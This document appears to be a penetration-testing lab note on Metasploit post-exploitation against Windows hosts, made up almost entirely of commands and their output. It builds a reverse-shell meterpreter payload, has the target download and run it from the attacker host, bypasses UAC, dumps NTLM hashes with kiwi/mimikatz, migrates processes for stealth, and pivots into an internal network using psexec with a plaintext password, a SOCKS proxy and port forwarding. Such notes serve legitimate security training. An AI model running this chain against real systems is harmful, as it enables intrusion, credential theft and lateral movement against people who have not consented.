# Post-Exploitation ## Meterpreter {% code overflow="wrap" %} ```bash # Create a non-staged payload $ msfvenom -p windows/x64/meterpreter_reverse_https LHOST=192.168.45.232 LPORT=443 -f exe -o met.exe # Setup listener $ sudo msfconsole -q msf6 > use exploit/multi/handler msf6 > set PAYLOAD windows/x64/meterpreter_reverse_https msf6 > set LHOST tun0 msf6 > set LPORT 443 msf6 > run ``` {% endcode %} ```bash # Download and execute the payload on the target $ nc 192.168.241.223 4444 Microsoft Windows [Version 10.0.22000.1219] (c) Microsoft Corporation. All rights reserved. C:\Users\luiza>powershell iwr -uri http://192.168.45.232/met.exe -OutFile met.exe powershell iwr -uri http://192.168.45.232/met.exe -OutFile met.exe C:\Users\luiza>.\met.exe .\met.exe ``` {% code overflow="wrap" %} ```bash # Catch the reverse shell msf6 exploit(multi/handler) > run [*] Started HTTPS reverse handler on https://192.168.45.232:443 ... [*] Meterpreter session 1 opened (192.168.45.232:443 -> 192.168.241.223:49595) at 2025-04-24 11:08:44 +0300 meterpreter > ``` {% endcode %} ### Inactivity Check Determines user inactivity; useful for stealth. ```bash meterpreter > idletime ``` ### Privilege Escalation Attempts `SYSTEM`-level access using techniques like Named Pipe Impersonation leveraging the `SeImpersonatePrivilege` and `SeDebugPrivilege`. ``` meterpreter > getsystem ``` ### **Process Migration** Moves session to another process to maintain stealth/persistence. Migration is only possible to processes with equal or lower security levels. ```bash meterpreter > ps meterpreter > migrate ``` If no suitable existing process is available, it can start a hidden process and migrate into it. ```bash execute -H -f notepad migrate ``` ## Modules ### UAC Bypass A typical client-side attack usually provides only an unprivileged shell. However, when the target user is a `local administrator`, we can attempt to elevate the shell's integrity level by bypassing User Account Control (UAC). The process below (`5656`) is running with a **medium integrity level**, meaning administrative actions would still be blocked by UAC. {% code overflow="wrap" %} ```powershell # Identify current privilege/integrity level meterpreter > shell Process 5656 created. ... C:\Windows\system32>powershell -ep bypass PS C:\Windows\system32> Import-Module NtObjectManager PS C:\Windows\system32> Get-NtTokenIntegrityLevel Medium # Escalate privileges PS C:\Windows\system32> ^Z Background channel 1? [y/N] y meterpreter > bg [*] Backgrounding session 2... msf6 exploit(multi/handler) > search UAC ... 21 exploit/windows/local/bypassuac_sdclt 2017-03-17 excellent Yes Windows Escalate UAC Protection Bypass (Via Shell Open Registry Key) ... msf6 exploit(multi/handler) > use 21 [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/local/bypassuac_sdclt) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 2 meterpreter x64/windows ITWK01\offsec @ ITWK01 192.168.45.232:443 -> 192.168.241.223:49294 (192.168.241.223) msf6 exploit(windows/local/bypassuac_sdclt) > set session 2 session => 2 msf6 exploit(windows/local/bypassuac_sdclt) > set LHOST 192.168.45.232 LHOST => 192.168.45.232 msf6 exploit(windows/local/bypassuac_sdclt) > run ... meterpreter > shell Process 7068 created. C:\Windows\system32>powershell -ep bypass PS C:\Windows\system32> Import-Module NtObjectManager PS C:\Windows\system32> Get-NtTokenIntegrityLevel High ``` {% endcode %} ### Kiwi With elevated privileges with can also load MSF's extensions, such as `kiwi`, a wrapper around `mimikatz`. The `creds_msv` extracts LM and NTLM hashes. {% code overflow="wrap" %} ```bash # Load mimikatz module meterpreter > getsystem ...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)). meterpreter > load kiwi meterpreter > creds_msv [+] Running as SYSTEM [*] Retrieving msv credentials msv credentials =============== Username Domain NTLM SHA1 -------- ------ ---- ---- luiza ITWK01 167837 offsec ITWK01 1c3bbd ``` {% endcode %} ## Pivoting **Dual-homed** machines can act as bridges between networks. ```powershell # Identify dual-homed system $ nc 192.168.241.223 4444 C:\Users\luiza>ipconfig ... Ethernet adapter Ethernet0: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::8a:de6d:6427:dabb%11 IPv4 Address. . . . . . . . . . . : 192.168.241.223 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.241.254 Ethernet adapter Ethernet1: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::6fa3:81f6:4ac1:1504%14 IPv4 Address. . . . . . . . . . . : 172.16.196.199 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : ``` ### Route add We can **manually add a route** to the second network (`172.16.16.0/24`) through the existing session in order to enable MSF to route traffic through a compromised host. This allows Metasploit to **"see" and interact** with devices on that internal network. > *Routes in Metasploit let you scan and exploit targets behind firewalls or NAT by tunneling through a compromised host.* ```bash meterpreter > bg [*] Backgrounding session 5... msf6 exploit(multi/handler) > route add 172.16.196.0/24 5 [*] Route added msf6 exploit(multi/handler) > route print IPv4 Active Routing Table ========================= Subnet Netmask Gateway ------ ------- ------- 172.16.196.0 255.255.255.0 Session 5 [*] There are currently no IPv6 routes defined. msf6 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 172.16.196.200 RHOSTS => 172.16.196.200 msf6 auxiliary(scanner/portscan/tcp) > set PORTS 445,3389 PORTS => 445,3389 msf6 auxiliary(scanner/portscan/tcp) > run [+] 172.16.196.200: - 172.16.196.200:445 - TCP OPEN [+] 172.16.196.200: - 172.16.196.200:3389 - TCP OPEN [*] 172.16.196.200: - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed ``` With the route added, we can now use MSF modules to compromise the second target. The `bind_tcp` payload is used because the target can’t initiate outbound traffic, but our attacking machine can connect to it instead. ```bash msf6 auxiliary(scanner/portscan/tcp) > use exploit/windows/smb/psexec ... smsf6 exploit(windows/smb/psexec) > set SMBUser luiza SMBUser => luiza msf6 exploit(windows/smb/psexec) > set SMBPass 'BoccieDearAeroMeow1!' SMBPass => BoccieDearAeroMeow1! msf6 exploit(windows/smb/psexec) > set RHOSTS 172.16.196.200 RHOSTS => 172.16.196.200 msf6 exploit(windows/smb/psexec) > set PAYLOAD windows/x64/meterpreter/bind_tcp PAYLOAD => windows/x64/meterpreter/bind_tcp msf6 exploit(windows/smb/psexec) > set LPORT 8000 LPORT => 8000 msf6 exploit(windows/smb/psexec) > run ... meterpreter > getuid Server username: NT AUTHORITY\SYSTEM ``` ### Autoroute Instead of adding routes manually, the `autoroute` module automatically adds all routable subnets from the compromised host. {% code overflow="wrap" %} ```bash msf6 exploit(multi/handler) > use multi/manage/autoroute msf6 post(multi/manage/autoroute) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 7 meterpreter x64/windows ITWK01\luiza @ ITWK01 192.168.45.232:443 -> 192.168.241.223:50215 (192.168.241.223) msf6 post(multi/manage/autoroute) > set SESSION 7 SESSION => 7 msf6 post(multi/manage/autoroute) > run [*] Running module against ITWK01 [*] Searching for subnets to autoroute. [+] Route added to subnet 172.16.196.0/255.255.255.0 from host's routing table. [+] Route added to subnet 192.168.241.0/255.255.255.0 from host's routing table. [*] Post module execution completed ``` {% endcode %} ### Socks\_proxy With a route in place, the `socks_proxy` module sets up a **SOCKS5 proxy server** on the attacker's machine. This enables tunneling through compromised host using `proxychains`, which lets any external app (like RDP clients) act as if it’s inside the internal network. > *SOCKS proxy + proxychains = full tool access to pivoted networks.* ```bash msf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy msf6 auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1 SRVHOST => 127.0.0.1 msf6 auxiliary(server/socks_proxy) > set VERSION 5 VERSION => 5 msf6 auxiliary(server/socks_proxy) > run -j [*] Auxiliary module running as background job 0. [*] Starting the SOCKS proxy server ``` {% code overflow="wrap" %} ```bash $ tail -n1 /etc/proxychains.conf socks5 127.0.0.1 1080 $ sudo proxychains xfreerdp /v:172.16.196.200 /u:luiza /p:'BoccieDearAeroMeow1!' /smart-sizing ``` {% endcode %} ### Portfwd Instead of a SOCKS proxy, we can forwards traffic from the attacker's machine directly to the internal target. This maps an internal service to a local port, allowing direct tool access. ```bash meterpreter > portfwd add -l 3389 -p 3389 -r 172.16.196.200 [*] Forward TCP relay created: (local) :3389 -> (remote) 172.16.196.200:3389 ``` ```bash $ sudo xfreerdp /v:127.0.0.1 /u:luiza /p:'BoccieDearAeroMeow1!' /smart-sizing ```